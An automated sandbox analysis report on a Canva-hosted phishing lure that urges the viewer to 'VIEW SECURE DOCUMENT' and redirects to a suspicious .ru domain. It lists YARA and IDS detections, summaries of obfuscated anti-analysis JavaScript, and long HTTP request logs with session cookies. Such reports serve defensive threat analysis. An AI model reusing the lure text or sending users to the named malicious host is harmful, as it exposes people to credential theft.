Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a

Overview

General Information

Sample URL:https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
Analysis ID:1578567
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code
Javascript checks online IP of machine
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2028,i,9838712427235616250,10325020197917731917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_104JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-19T22:27:45.893359+010020221121Exploit Kit Activity Detected192.168.2.449841172.217.19.228443TCP
    2024-12-19T22:27:48.518418+010020221121Exploit Kit Activity Detected192.168.2.449848172.217.19.228443TCP

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_104, type: DROPPED
    Source: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aJoe Sandbox AI: Page contains button: 'VIEW SECURE DOCUMENT' Source: '1.3.pages.csv'
    Source: 0.33.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://58ts.vomlogsffy.ru/z9yaFIg/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to an external domain. The combination of these behaviors suggests a malicious intent to prevent analysis and potentially compromise the user's system.
    Source: 0.32.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://58ts.vomlogsffy.ru/z9yaFIg/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. While the intent is not entirely clear, the combination of these factors suggests a potentially malicious script that requires further investigation.
    Source: 0.34.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://58ts.vomlogsffy.ru/z9yaFIg/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: Chrome DOM: 1.3OCR Text: New Document Received You've received (2) new PDF Documents for your review Please sign & return VIEW SECURE DOCUMENT
    Source: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aHTTP Parser: Base64 decoded: 1734643639.000000
    Source: https://cdn.metadata.io/site-insights.jsHTTP Parser: (function () { /** * @type {string} key for the visitor id cookie. */ const visitoridkey = "metadata_visitor_id"; /** * @type {string} key for the session id cookie. */ const sessionidkey = "metadata_session_id"; /** * @type {string} ip address of the client. */ let ip; /** * account configuration object. */ const config = { invalid: true }; /** * options object. */ const opts = { /** * @type {string} base url for the cdn. */ cdnbaseurl: "https://cdn.metadata.io/pixel/config", /** * @type {string} base url for the api. */ baseurl: "https://api-gw.metadata.io", /** * @type {string} account id. */ accountid: null }; /** * get the value of a cookie. * @param {string} key - the key of the cookie. * @returns {string|null} the value of the cookie, or null if not found. */ const getcookievalue = (key) => { const cookie = document.cookie.split("; ").find(function (cookie) { ...
    Source: https://58ts.vomlogsffy.ru/z9yaFIg/HTTP Parser: No favicon
    Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:49841 -> 172.217.19.228:443
    Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:49848 -> 172.217.19.228:443
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
    Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a HTTP/1.1Host: www.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/a0684b0780c739e9.vendor.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/19jbs9.2447b447994aff36.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/579a47f0411a508b.strings.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/4b29606fa142efca.runtime.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/76d8b06612b94585.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/a539f22cb4b4cc9e.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /static/lib/sentry/7.16.0.min.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/19jbs9.7484ddd0951f6659.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/579a47f0411a508b.strings.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/4b29606fa142efca.runtime.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /static/lib/sentry/7.16.0.min.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/76d8b06612b94585.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/a539f22cb4b4cc9e.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /api/6097940/envelope/?sentry_key=2bfedc9d03674aacac8aa2762f22fefd&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.16.0 HTTP/1.1Host: o13855.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /web/19jbs9.7484ddd0951f6659.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/4e14dd1571e90f68.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/2c8d424892fc6ce6.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/f0398d1166314304.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/f919d823e68691c3.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/32526717065b2b04.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
    Source: global trafficHTTP traffic detected: GET /web/0cda863f2baa0d46.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
